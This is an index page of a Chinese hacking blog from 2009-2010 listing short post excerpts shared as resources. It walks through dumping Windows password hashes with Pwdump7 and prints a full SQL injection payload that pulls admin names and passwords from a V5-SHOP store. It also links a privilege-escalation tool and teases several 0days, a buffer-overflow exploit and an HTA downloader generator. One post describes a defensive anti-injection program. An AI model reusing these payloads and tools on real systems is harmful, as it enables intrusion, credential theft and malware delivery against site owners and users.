影子鹰安全网络-主站技术BLOG

用户登陆

站点日历

7 3 2010 - 9 4 8
日	一	二	三	四	五	六
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30

站点统计

日志：1320 篇
评论：3702 篇
引用：303812 个
会员：1170 人
留言：172 个
访问：18749422 次
今日：18670 平均：7000
建站：2001-10-10
在线人数： ?

最新评论

日志搜索

友情链接

域名1元加1元送主机

共享技术网络平台
更多友情链接...

其他信息

[全部订阅更新]
[鄂ICP备05002492号]

联系我

旗下域名

www.cn9x.com
www.cnyzy.cn

FEED订阅数一览

EMAIL订阅FEED

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... [29]

显示模式:

默认模式 |

树形模式

使用Pwdump7提取系统密码hash值 [ 2010-08-20 08:31:14 | 影子鹰 ]

首先，下载“Pwdump7.rar”这个文件，并将其解压到D盘根目录下。接着，打开“命令提示符”窗口并输入“PwDump7”命令，在按下回车键后即可看到如图所示的结果。

图命令执行结果这里的“PASSWORD”后面是一串星号，这表示当前帐户没有设置密码。当我们为Administrator帐户设置一个密码后，再次运行“PwDump7”命令时，就会得到如下内容：Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::这个获得的密码是一个密文，我们还需要对其进行反译才能获得相应的明文密码。先来看一下“PwDump7”命令的其他用法：pwdump7.exe -s (Dump passwords from files)pwdump7.exe -d [destionation] (Copy filename to destionation)pwdump7.exe -h (Show this help)这里的“-s”参数，是指从SAM数据库文件中提取hash，这个文件位于“%systemroot%\config\sam”目录中。这里的“-d”参数，是指把一个文件复制到另一个位置，如命令可以是：D:\>PwDump7.exe –d c:\abc.sys abc.chm这个转移参数的最大魅力，是可以把进程正在调用的文件复制成功，如复制“pagefile.sys ”文件。

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：75

提权大杀器，首发2010黑帽大会 [ 2010-08-10 09:55:29 | 影子鹰 ]

按此在新窗口打开图片

临时下载地址：附源码和利用程序

http://www.51chi.net/sysexp/提权大杀器.rar

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：105

V5-SHOP商城SQL注射0day [ 2010-07-21 09:23:52 | 影子鹰 ]

net 的在线商城系统
以下是测试EXP：

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 11=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 –

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：94

Real Player 12.0.0.879-0day [ 2010-07-19 08:27:17 | 影子鹰 ]

漏洞说明：利用Microsof help漏洞

共计8个文件：

._calc.html

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：107

Sa-Upfile 1.0(sa权限上传文件) [ 2009-12-17 09:28:13 | 影子鹰 ]

Sa-Upfile 1.0(sa权限上传文件)

使用环境:SQL2000，SA权限，常用提权扩展存在。

原理：利用textcopy进行二进制导入导出。

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：354

Savant Web Server 3.1 Remote Exploit [ 2009-12-15 08:50:05 | 影子鹰 ]

# Title: Savant Web Server 3.1 Remote Buffer Overflow Exploit
# EDB-ID: 10434
# CVE-ID: ()
# OSVDB-ID: ()
# Author: DouBle_Zer0

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：310

SQL通用防注入程序 20091206版 [ 2009-12-11 08:29:34 | 影子鹰 ]

主要解决了以下几个问题：

更新搜索引擎跳转引起的误报。其实这个是由于之前的默认的过滤规则中有%的缘故，如果有的网站统计了访问来源的话，就有可能导致搜索引擎过来的访客报sql注入，无法访问，20091206版中删除了对于%和*的过滤。
修改数据库访问路径为绝对路径。原来的是采用虚拟路径访问数据库的，如果有的朋友部署的目录比较奇怪的话，可能会导致找不到sql防注入的数据库，20091206版本不会有这个问题了，可以支持将数据库放之非web目录。
修改原来的安全页面功能为安全表单。原来的安全页面功能是为了防止后台添加数据的时候，存在sql注入过滤关键字字符而设置了，本版本修改了安全页面功能为安全表单，将误报白名单细化到了表单。使用方法：如果发现本系统影响了你的网站正常的添加数据，可以将你认为安全的表单添加至安全表单，可通过管理页面查看影响的参数，然后将其添加至后台管理-》参数设置中的安全表单，并启用安全表单即可。

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：317

Joomla Component Quick News SQL [ 2009-12-03 09:34:58 | 影子鹰 ]

Joomla Component Quick News SQL Injection Vulnerability

[ Software Information ]

[+] Download :http://joomlacode.org/gf/project/quicknews/

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：321

XMLDOM下载者生成器(xmldown.hta) [ 2009-12-01 08:49:13 | 影子鹰 ]

以下代码保存成hta文件，可生成js和vbs下载者

<HTA:APPLICATION
ID="xmldown"

阅读全文……

作者：kawen | 分类：资源共享 | 评论：0 | 引用：0 | 查看：389

网人信息发布系统(WRMPS)通杀0day [ 2009-11-20 09:13:36 | 影子鹰 ]

影响版本：通杀，最新

漏洞描述：
搜:Powered By WRMPS
1.注册-列目录